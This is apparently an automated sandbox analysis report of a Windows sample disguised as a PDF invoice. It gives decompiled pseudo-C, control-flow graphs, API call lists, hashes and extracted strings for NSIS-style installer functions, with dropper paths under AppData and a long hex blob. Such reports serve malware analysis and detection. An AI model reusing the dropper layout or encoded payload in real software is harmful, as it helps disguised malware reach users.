                                                                      • String ID: C:\Users\user\AppData\Local\Deskriptiv155\Hjertere$C:\Users\user\AppData\Local\Temp\nssE334.tmp$C:\Users\user\AppData\Local\Temp\nssE334.tmp\System.dll$Call
                                                                      • API String ID: 1941528284-2817306132
                                                                      • Opcode ID: 00536d43247b0e684560901737a3663a089175b994d03775e1e0762796f7db5e
                                                                      • Instruction ID: 0d28a5e8dae66ca407d9ab1903032e249cf50254bac70f3abe216f7737186e0f
                                                                      • Opcode Fuzzy Hash: 00536d43247b0e684560901737a3663a089175b994d03775e1e0762796f7db5e
                                                                      • Instruction Fuzzy Hash: 0541B131900119BACF217BA5CD45DAF3A79EF01368B20427FF422B10E1DB3C8A519A6E
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00405371 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72stringwindowCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 823 405371-405386 824 40538c-40539d 823->824 825 40543d-405441 823->825 826 4053a8-4053b4 lstrlenW 824->826 827 40539f-4053a3 call 406234 824->827 829 4053d1-4053d5 826->829 830 4053b6-4053c6 lstrlenW 826->830 827->826 832 4053e4-4053e8 829->832 833 4053d7-4053de SetWindowTextW 829->833 830->825 831 4053c8-4053cc lstrcatW 830->831 831->829 834 4053ea-40542c SendMessageW * 3 832->834 835 40542e-405430 832->835 833->832 834->835 835->825 836 405432-405435 835->836 836->825
                                                                      C-Code - Quality: 100%
                                                                      			E00405371(signed int _a4, WCHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				WCHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				WCHAR* _t27;
				signed int _t28;
				long _t29;
				signed int _t37;
				signed int _t38;

				_t27 =  *0x429224;
				_v8 = _t27;
				if(_t27 != 0) {
					_t37 =  *0x42a2f4;
					_v12 = _t37;
					_t38 = _t37 & 0x00000001;
					if(_t38 == 0) {
						E00406234(_t38, 0, 0x422708, 0x422708, _a4);
					}
					_t27 = lstrlenW(0x422708);
					_a4 = _t27;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) == 0) {
							_t27 = SetWindowTextW( *0x429208, 0x422708); // executed
						}
						if((_v12 & 0x00000002) == 0) {
							_v32 = 0x422708;
							_v52 = 1;
							_t29 = SendMessageW(_v8, 0x1004, 0, 0); // executed
							_v44 = 0;
							_v48 = _t29 - _t38;
							SendMessageW(_v8, 0x104d - _t38, 0,  &_v52); // executed
							_t27 = SendMessageW(_v8, 0x1013, _v48, 0); // executed
						}
						if(_t38 != 0) {
							_t28 = _a4;
							0x422708[_t28] = 0;
							return _t28;
						}
					} else {
						_t27 = lstrlenW(_a8) + _a4;
						if(_t27 < 0x1000) {
							_t27 = lstrcatW(0x422708, _a8);
							goto L6;
						}
					}
				}
				return _t27;
			}

















                                                                      0x00405377
                                                                      0x00405381
                                                                      0x00405386
                                                                      0x0040538c
                                                                      0x00405397
                                                                      0x0040539a
                                                                      0x0040539d
                                                                      0x004053a3
                                                                      0x004053a3
                                                                      0x004053a9
                                                                      0x004053b1
                                                                      0x004053b4
                                                                      0x004053d1
                                                                      0x004053d5
                                                                      0x004053de
                                                                      0x004053de
                                                                      0x004053e8
                                                                      0x004053f1
                                                                      0x004053fd
                                                                      0x00405404
                                                                      0x00405408
                                                                      0x0040540b
                                                                      0x0040541e
                                                                      0x0040542c
                                                                      0x0040542c
                                                                      0x00405430
                                                                      0x00405432
                                                                      0x00405435
                                                                      0x00000000
                                                                      0x00405435
                                                                      0x004053b6
                                                                      0x004053be
                                                                      0x004053c6
                                                                      0x004053cc
                                                                      0x00000000
                                                                      0x004053cc
                                                                      0x004053c6
                                                                      0x004053b4
                                                                      0x00405441

                                                                      APIs
                                                                      • lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nssE334.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EAD,00000000,?), ref: 004053A9
                                                                      • lstrlenW.KERNEL32(00402EAD,Skipped: C:\Users\user\AppData\Local\Temp\nssE334.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EAD,00000000), ref: 004053B9
                                                                      • lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nssE334.tmp\System.dll,00402EAD), ref: 004053CC
                                                                      • SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nssE334.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nssE334.tmp\System.dll), ref: 004053DE
                                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405404
                                                                      • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040541E
                                                                      • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040542C
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.167508240401.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000002.00000002.167508184127.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508327237.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508702241.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                      • String ID: Skipped: C:\Users\user\AppData\Local\Temp\nssE334.tmp\System.dll
                                                                      • API String ID: 2531174081-4078076784
                                                                      • Opcode ID: e0d278b4f454602652d1392a5fb3045d02927be56822f9b38c604404e895085a
                                                                      • Instruction ID: a3987805c55db6f4a015f8fdfae83c311b34e51693a8fcc51f5c24f156ed4de6
                                                                      • Opcode Fuzzy Hash: e0d278b4f454602652d1392a5fb3045d02927be56822f9b38c604404e895085a
                                                                      • Instruction Fuzzy Hash: A3218C71900518BBCB119F95ED84ACFBFB8EF45350F50807AF904B62A0C3B98A91DF68
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00402660 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153fileCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 837 402660-402679 call 402c31 840 402adb-402ade 837->840 841 40267f-402686 837->841 842 402ae4-402aea 840->842 843 402688 841->843 844 40268b-40268e 841->844 843->844 846 4027f2-4027fa 844->846 847 402694-4026a3 call 406172 844->847 846->840 847->846 850 4026a9 847->850 851 4026af-4026b3 850->851 852 402748-40274b 851->852 853 4026b9-4026d4 ReadFile 851->853 855 402763-402773 call 405e6a 852->855 856 40274d-402750 852->856 853->846 854 4026da-4026df 853->854 854->846 858 4026e5-4026f3 854->858 855->846 865 402775 855->865 856->855 859 402752-40275d call 405ec8 856->859 861 4026f9-40270b MultiByteToWideChar 858->861 862 4027ae-4027ba call 406159 858->862 859->846 859->855 861->865 866 40270d-402710 861->866 862->842 868 402778-40277b 865->868 869 402712-40271d 866->869 868->862 871 40277d-402782 868->871 869->868 872 40271f-402744 SetFilePointer MultiByteToWideChar 869->872 873 402784-402789 871->873 874 4027bf-4027c3 871->874 872->869 875 402746 872->875 873->874 876 40278b-40279e 873->876 877 4027e0-4027ec SetFilePointer 874->877 878 4027c5-4027c9 874->878 875->865 876->846 881 4027a0-4027a6 876->881 877->846 879 4027d1-4027de 878->879 880 4027cb-4027cf 878->880 879->846 880->877 880->879 881->851 882 4027ac 881->882 882->846
                                                                      C-Code - Quality: 83%
                                                                      			E00402660(intOrPtr __ebx, intOrPtr __edx, void* __esi) {
				intOrPtr _t65;
				intOrPtr _t66;
				intOrPtr _t72;
				void* _t76;
				void* _t79;

				_t72 = __edx;
				 *((intOrPtr*)(_t76 - 8)) = __ebx;
				_t65 = 2;
				 *((intOrPtr*)(_t76 - 0x48)) = _t65;
				_t66 = E00402C31(_t65);
				_t79 = _t66 - 1;
				 *((intOrPtr*)(_t76 - 0x50)) = _t72;
				 *((intOrPtr*)(_t76 - 0x38)) = _t66;
				if(_t79 < 0) {
					L36:
					 *0x42a2c8 =  *0x42a2c8 +  *((intOrPtr*)(_t76 - 4));
				} else {
					__ecx = 0x3ff;
					if(__eax > 0x3ff) {
						 *(__ebp - 0x38) = 0x3ff;
					}
					if( *__esi == __bx) {
						L34:
						__ecx =  *(__ebp - 0xc);
						__eax =  *(__ebp - 8);
						 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __bx;
						if(_t79 == 0) {
							 *((intOrPtr*)(_t76 - 4)) = 1;
						}
						goto L36;
					} else {
						 *(__ebp - 0x30) = __ebx;
						 *(__ebp - 0x10) = E00406172(__ecx, __esi);
						if( *(__ebp - 0x38) > __ebx) {
							do {
								if( *((intOrPtr*)(__ebp - 0x2c)) != 0x39) {
									if( *((intOrPtr*)(__ebp - 0x1c)) != __ebx ||  *(__ebp - 8) != __ebx || E00405EC8( *(__ebp - 0x10), __ebx) >= 0) {
										__eax = __ebp - 0x44;
										if(E00405E6A( *(__ebp - 0x10), __ebp - 0x44, 2) == 0) {
											goto L34;
										} else {
											goto L21;
										}
									} else {
										goto L34;
									}
								} else {
									__eax = __ebp - 0x40;
									_push(__ebx);
									_push(__ebp - 0x40);
									__eax = 2;
									__ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x1c)) = __ebp + 0xa;
									__eax = ReadFile( *(__ebp - 0x10), __ebp + 0xa, __ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x1c)), ??, ??); // executed
									if(__eax == 0) {
										goto L34;
									} else {
										__ecx =  *(__ebp - 0x40);
										if(__ecx == __ebx) {
											goto L34;
										} else {
											__ax =  *(__ebp + 0xa) & 0x000000ff;
											 *(__ebp - 0x48) = __ecx;
											 *(__ebp - 0x44) = __eax;
											if( *((intOrPtr*)(__ebp - 0x1c)) != __ebx) {
												L28:
												__ax & 0x0000ffff = E00406159( *(__ebp - 0xc), __ax & 0x0000ffff);
											} else {
												__ebp - 0x44 = __ebp + 0xa;
												if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa, __ecx, __ebp - 0x44, ?str?) != 0) {
													L21:
													__eax =  *(__ebp - 0x44);
												} else {
													__esi =  *(__ebp - 0x48);
													__esi =  ~( *(__ebp - 0x48));
													while(1) {
														_t22 = __ebp - 0x40;
														 *_t22 =  *(__ebp - 0x40) - 1;
														__eax = 0xfffd;
														 *(__ebp - 0x44) = 0xfffd;
														if( *_t22 == 0) {
															goto L22;
														}
														 *(__ebp - 0x48) =  *(__ebp - 0x48) - 1;
														__esi = __esi + 1;
														__eax = SetFilePointer( *(__ebp - 0x10), __esi, __ebx, "true"); // executed
														__ebp - 0x44 = __ebp + 0xa;
														if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa,  *(__ebp - 0x40), __ebp - 0x44, ?str?) == 0) {
															continue;
														} else {
															goto L21;
														}
														goto L22;
													}
												}
												L22:
												if( *((intOrPtr*)(__ebp - 0x1c)) != __ebx) {
													goto L28;
												} else {
													if( *(__ebp - 0x30) == 0xd ||  *(__ebp - 0x30) == 0xa) {
														if( *(__ebp - 0x30) == __ax || __ax != 0xd && __ax != 0xa) {
															 *(__ebp - 0x48) =  ~( *(__ebp - 0x48));
															__eax = SetFilePointer( *(__ebp - 0x10),  ~( *(__ebp - 0x48)), __ebx, "true");
														} else {
															__ecx =  *(__ebp - 0xc);
															__edx =  *(__ebp - 8);
															 *(__ebp - 8) =  *(__ebp - 8) + 1;
															 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
														}
														goto L34;
													} else {
														__ecx =  *(__ebp - 0xc);
														__edx =  *(__ebp - 8);
														 *(__ebp - 8) =  *(__ebp - 8) + 1;
														 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
														 *(__ebp - 0x30) = __eax;
														if(__ax == __bx) {
															goto L34;
														} else {
															goto L26;
														}
													}
												}
											}
										}
									}
								}
								goto L37;
								L26:
								__eax =  *(__ebp - 8);
							} while ( *(__ebp - 8) <  *(__ebp - 0x38));
						}
						goto L34;
					}
				}
				L37:
				return 0;
			}








                                                                      0x00402660
                                                                      0x00402662
                                                                      0x00402665
                                                                      0x00402667
                                                                      0x0040266a
                                                                      0x0040266f
                                                                      0x00402673
                                                                      0x00402676
                                                                      0x00402679
                                                                      0x00402adb
                                                                      0x00402ade
                                                                      0x0040267f
                                                                      0x0040267f
                                                                      0x00402686
                                                                      0x00402688
                                                                      0x00402688
                                                                      0x0040268e
                                                                      0x004027f2
                                                                      0x004027f2
                                                                      0x004027f5
                                                                      0x004027fa
                                                                      0x004015b6
                                                                      0x004028a1
                                                                      0x004028a1
                                                                      0x00000000
                                                                      0x00402694
                                                                      0x00402695
                                                                      0x004026a0
                                                                      0x004026a3
                                                                      0x004026af
                                                                      0x004026b3
                                                                      0x0040274b
                                                                      0x00402763
                                                                      0x00402773
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004026b9
                                                                      0x004026b9
                                                                      0x004026bc
                                                                      0x004026bd
                                                                      0x004026c0
                                                                      0x004026c5
                                                                      0x004026cc
                                                                      0x004026d4
                                                                      0x00000000
                                                                      0x004026da
                                                                      0x004026da
                                                                      0x004026df
                                                                      0x00000000
                                                                      0x004026e5
                                                                      0x004026e5
                                                                      0x004026ed
                                                                      0x004026f0
                                                                      0x004026f3
                                                                      0x004027ae
                                                                      0x004027b5
                                                                      0x004026f9
                                                                      0x004026ff
                                                                      0x0040270b
                                                                      0x00402775
                                                                      0x00402775
                                                                      0x0040270d
                                                                      0x0040270d
                                                                      0x00402710
                                                                      0x00402712
                                                                      0x00402712
                                                                      0x00402712
                                                                      0x00402715
                                                                      0x0040271a
                                                                      0x0040271d
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040271f
                                                                      0x00402722
                                                                      0x0040272a
                                                                      0x00402736
                                                                      0x00402744
                                                                      0x00000000
                                                                      0x00402746
                                                                      0x00000000
                                                                      0x00402746
                                                                      0x00000000
                                                                      0x00402744
                                                                      0x00402712
                                                                      0x00402778
                                                                      0x0040277b
                                                                      0x00000000
                                                                      0x0040277d
                                                                      0x00402782
                                                                      0x004027c3
                                                                      0x004027e5
                                                                      0x004027ec
                                                                      0x004027d1
                                                                      0x004027d1
                                                                      0x004027d4
                                                                      0x004027d7
                                                                      0x004027da
                                                                      0x004027da
                                                                      0x00000000
                                                                      0x0040278b
                                                                      0x0040278b
                                                                      0x0040278e
                                                                      0x00402791
                                                                      0x00402797
                                                                      0x0040279b
                                                                      0x0040279e
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040279e
                                                                      0x00402782
                                                                      0x0040277b
                                                                      0x004026f3
                                                                      0x004026df
                                                                      0x004026d4
                                                                      0x00000000
                                                                      0x004027a0
                                                                      0x004027a0
                                                                      0x004027a3
                                                                      0x004027ac
                                                                      0x00000000
                                                                      0x004026a3
                                                                      0x0040268e
                                                                      0x00402ae4
                                                                      0x00402aea

                                                                      APIs
                                                                      • ReadFile.KERNELBASE(?,?,?,?), ref: 004026CC
                                                                      • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,?), ref: 00402707
                                                                      • SetFilePointer.KERNELBASE(?,?,?,?,?,00000008,?,?,?,?), ref: 0040272A
                                                                      • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,?,?,?,?,00000008,?,?,?,?), ref: 00402740
                                                                        • Part of subcall function 00405EC8: SetFilePointer.KERNEL32(?,00000000,00000000,?), ref: 00405EDE
                                                                      • SetFilePointer.KERNEL32(?,?,?,?,?,?,00000002), ref: 004027EC
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.167508240401.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000002.00000002.167508184127.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508327237.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508702241.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.jbxd
                                                                      Similarity
                                                                      • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                      • String ID: 9
                                                                      • API String ID: 163830602-2366072709
                                                                      • Opcode ID: f36db519b21e3b49fb6bb7097e34d361343d375d75a7a6e62764685d0406dfed
                                                                      • Instruction ID: cf5e27d2714951497ad0250a6e54f1fa2860b8b617eea02cda273725ea92b50b
                                                                      • Opcode Fuzzy Hash: f36db519b21e3b49fb6bb7097e34d361343d375d75a7a6e62764685d0406dfed
                                                                      • Instruction Fuzzy Hash: B9511674900219AADF20DF94DE88AAEB7B9FF04304F50403BE941F72D1D7B89982DB59
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00403283 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 101COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 883 403283-4032ab GetTickCount 884 4032b1-4032dc call 403402 SetFilePointer 883->884 885 4033db-4033e3 call 402e33 883->885 891 4032e1-4032f3 884->891 890 4033e5-4033e9 885->890 892 4032f5 891->892 893 4032f7-403305 call 4033ec 891->893 892->893 896 40330b-403317 893->896 897 4033cd-4033d0 893->897 898 40331d-403323 896->898 897->890 899 403325-40332b 898->899 900 40334e-40336a call 40672b 898->900 899->900 901 40332d-40334d call 402e33 899->901 906 4033d6 900->906 907 40336c-403374 900->907 901->900 908 4033d8-4033d9 906->908 909 403376-40337e call 405e99 907->909 910 403397-40339d 907->910 908->890 913 403383-403385 909->913 910->906 912 40339f-4033a1 910->912 912->906 914 4033a3-4033b6 912->914 916 4033d2-4033d4 913->916 917 403387-403393 913->917 914->891 915 4033bc-4033cb SetFilePointer 914->915 915->885 916->908 917->898 918 403395 917->918 918->914
                                                                      C-Code - Quality: 94%
                                                                      			E00403283(intOrPtr _a4) {
				intOrPtr _t10;
				intOrPtr _t11;
				signed int _t12;
				void* _t14;
				void* _t15;
				long _t16;
				void* _t18;
				intOrPtr _t19;
				intOrPtr _t31;
				long _t32;
				intOrPtr _t34;
				intOrPtr _t36;
				void* _t37;
				intOrPtr _t49;

				_t32 =  *0x418ed4; // 0x484e3
				_t34 = _t32 -  *0x40ce40 + _a4;
				 *0x42a24c = GetTickCount() + 0x1f4;
				if(_t34 <= 0) {
					L22:
					E00402E33("true");
					return 0;
				}
				E00403402( *0x418ee4);
				SetFilePointer( *0x40a01c,  *0x40ce40, 0, 0); // executed
				 *0x418ee0 = _t34;
				 *0x418ed0 = 0;
				while(1) {
					_t10 =  *0x418ed8; // 0x54fe4
					_t31 = 0x4000;
					_t11 = _t10 -  *0x418ee4;
					if(_t11 <= 0x4000) {
						_t31 = _t11;
					}
					_t12 = E004033EC(0x414ed0, _t31);
					if(_t12 == 0) {
						break;
					}
					 *0x418ee4 =  *0x418ee4 + _t31;
					 *0x40ce60 = 0x414ed0;
					 *0x40ce64 = _t31;
					L6:
					L6:
					if( *0x42a250 != 0 &&  *0x42a2e0 == 0) {
						_t19 =  *0x418ee0; // 0x3c883
						 *0x418ed0 = _t19 -  *0x418ed4 - _a4 +  *0x40ce40;
						E00402E33(0);
					}
					 *0x40ce68 = 0x40ced0;
					 *0x40ce6c = 0x8000; // executed
					_t14 = E0040672B(0x40ce48); // executed
					if(_t14 < 0) {
						goto L20;
					}
					_t36 =  *0x40ce68; // 0x412a36
					_t37 = _t36 - 0x40ced0;
					if(_t37 == 0) {
						__eflags =  *0x40ce64; // 0x0
						if(__eflags != 0) {
							goto L20;
						}
						__eflags = _t31;
						if(_t31 == 0) {
							goto L20;
						}
						L16:
						_t16 =  *0x418ed4; // 0x484e3
						if(_t16 -  *0x40ce40 + _a4 > 0) {
							continue;
						}
						SetFilePointer( *0x40a01c, _t16, 0, 0); // executed
						goto L22;
					}
					_t18 = E00405E99( *0x40a01c, 0x40ced0, _t37); // executed
					if(_t18 == 0) {
						_push(0xfffffffe);
						L21:
						_pop(_t15);
						return _t15;
					}
					 *0x40ce40 =  *0x40ce40 + _t37;
					_t49 =  *0x40ce64; // 0x0
					if(_t49 != 0) {
						goto L6;
					}
					goto L16;
					L20:
					_push(0xfffffffd);
					goto L21;
				}
				return _t12 | 0xffffffff;
			}

















                                                                      0x00403286
                                                                      0x00403293
                                                                      0x004032a6
                                                                      0x004032ab
                                                                      0x004033db
                                                                      0x004033dd
                                                                      0x00000000
                                                                      0x004033e3
                                                                      0x004032b7
                                                                      0x004032ca
                                                                      0x004032d0
                                                                      0x004032d6
                                                                      0x004032e1
                                                                      0x004032e1
                                                                      0x004032e6
                                                                      0x004032eb
                                                                      0x004032f3
                                                                      0x004032f5
                                                                      0x004032f5
                                                                      0x004032fe
                                                                      0x00403305
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040330b
                                                                      0x00403311
                                                                      0x00403317
                                                                      0x00000000
                                                                      0x0040331d
                                                                      0x00403323
                                                                      0x0040332d
                                                                      0x00403343
                                                                      0x00403348
                                                                      0x0040334d
                                                                      0x00403353
                                                                      0x00403359
                                                                      0x00403363
                                                                      0x0040336a
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040336c
                                                                      0x00403372
                                                                      0x00403374
                                                                      0x00403397
                                                                      0x0040339d
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040339f
                                                                      0x004033a1
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004033a3
                                                                      0x004033a3
                                                                      0x004033b6
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004033c5
                                                                      0x00000000
                                                                      0x004033c5
                                                                      0x0040337e
                                                                      0x00403385
                                                                      0x004033d2
                                                                      0x004033d8
                                                                      0x004033d8
                                                                      0x00000000
                                                                      0x004033d8
                                                                      0x00403387
                                                                      0x0040338d
                                                                      0x00403393
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004033d6
                                                                      0x004033d6
                                                                      0x00000000
                                                                      0x004033d6
                                                                      0x00000000

                                                                      APIs
                                                                      • GetTickCount.KERNEL32 ref: 00403297
                                                                        • Part of subcall function 00403402: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403100,?), ref: 00403410
                                                                      • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,004031AD,00000004,00000000,00000000,?,?,00403127,000000FF,00000000,00000000,0040A230,?), ref: 004032CA
                                                                      • SetFilePointer.KERNELBASE(000484E3,00000000,00000000,<?xml version="1.0" encoding="UTF-8"?><svg height="16px" viewBox="0 0 16 16" width="16px" xmlns="http://www.w3.org/2000/svg"> <g fill="#2e3436"> <path d="m 6 0 c -1.644531 0 -3 1.355469 -3 3 v 10 c 0 1.644531 1.355469 3 3 3 h 4 c 1.644531 0 3 -1.3,00004000,?,00000000,004031AD,00000004,00000000,00000000,?,?,00403127,000000FF,00000000), ref: 004033C5
                                                                      Strings
                                                                      • <?xml version="1.0" encoding="UTF-8"?><svg height="16px" viewBox="0 0 16 16" width="16px" xmlns="http://www.w3.org/2000/svg"> <g fill="#2e3436"> <path d="m 6 0 c -1.644531 0 -3 1.355469 -3 3 v 10 c 0 1.644531 1.355469 3 3 3 h 4 c 1.644531 0 3 -1.3, xrefs: 004032F7, 004032FD
                                                                      • 6*A, xrefs: 00403353, 0040336C
                                                                      • B41F94611FD6BF153E261AB07A9ECA49830D57CAEAB658C7B8C11621F8B28D3ED2DCD927DB766B5BAD444660F4D744BAB786B14540EFE1FF57DDE90A2AC5202DC63FBF1CF19E3E6F2193F28AF9138C98045CC9FB43525E48CB5D6C678F4165840A83F9FA91CD0C143005FE65B83B7EA51C683342FC12BB4FCBEA89F113C1691BA405, xrefs: 004032DC, 00403377
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.167508240401.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000002.00000002.167508184127.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508327237.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508702241.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.jbxd
                                                                      Similarity
                                                                      • API ID: FilePointer$CountTick
                                                                      • String ID: 6*A$<?xml version="1.0" encoding="UTF-8"?><svg height="16px" viewBox="0 0 16 16" width="16px" xmlns="http://www.w3.org/2000/svg"> <g fill="#2e3436"> <path d="m 6 0 c -1.644531 0 -3 1.355469 -3 3 v 10 c 0 1.644531 1.355469 3 3 3 h 4 c 1.644531 0 3 -1.3$B41F94611FD6BF153E261AB07A9ECA49830D57CAEAB658C7B8C11621F8B28D3ED2DCD927DB766B5BAD444660F4D744BAB786B14540EFE1FF57DDE90A2AC5202DC63FBF1CF19E3E6F2193F28AF9138C98045CC9FB43525E48CB5D6C678F4165840A83F9FA91CD0C143005FE65B83B7EA51C683342FC12BB4FCBEA89F113C1691BA405
                                                                      • API String ID: 1092082344-2764528893
                                                                      • Opcode ID: 7f87ec3f3126c4afc5deb31522855fdbb853a78037bb661dde8e94ffc6001a55
                                                                      • Instruction ID: 6f8adcdc05782984f9803186be869087625e4848c31a04748361169110b3332d
                                                                      • Opcode Fuzzy Hash: 7f87ec3f3126c4afc5deb31522855fdbb853a78037bb661dde8e94ffc6001a55
                                                                      • Instruction Fuzzy Hash: 66314A72614205DBD7109F29FEC49663BA9F74039A714423FE900F22E0DBB9AD018B9D
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0040657C Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 925 40657c-40659c GetSystemDirectoryW 926 4065a0-4065a2 925->926 927 40659e 925->927 928 4065b3-4065b5 926->928 929 4065a4-4065ad 926->929 927->926 931 4065b6-4065e9 wsprintfW LoadLibraryExW 928->931 929->928 930 4065af-4065b1 929->930 930->931
                                                                      C-Code - Quality: 100%
                                                                      			E0040657C(intOrPtr _a4) {
				short _v576;
				signed int _t13;
				struct HINSTANCE__* _t17;
				signed int _t19;
				void* _t24;

				_t13 = GetSystemDirectoryW( &_v576, 0x104);
				if(_t13 > 0x104) {
					_t13 = 0;
				}
				if(_t13 == 0 ||  *((short*)(_t24 + _t13 * 2 - 0x23e)) == 0x5c) {
					_t19 = 1;
				} else {
					_t19 = 0;
				}
				wsprintfW(_t24 + _t13 * 2 - 0x23c, L"%s%S.dll", 0x40a014 + _t19 * 2, _a4);
				_t17 = LoadLibraryExW( &_v576, 0, 8); // executed
				return _t17;
			}








                                                                      0x00406593
                                                                      0x0040659c
                                                                      0x0040659e
                                                                      0x0040659e
                                                                      0x004065a2
                                                                      0x004065b5
                                                                      0x004065af
                                                                      0x004065af
                                                                      0x004065af
                                                                      0x004065ce
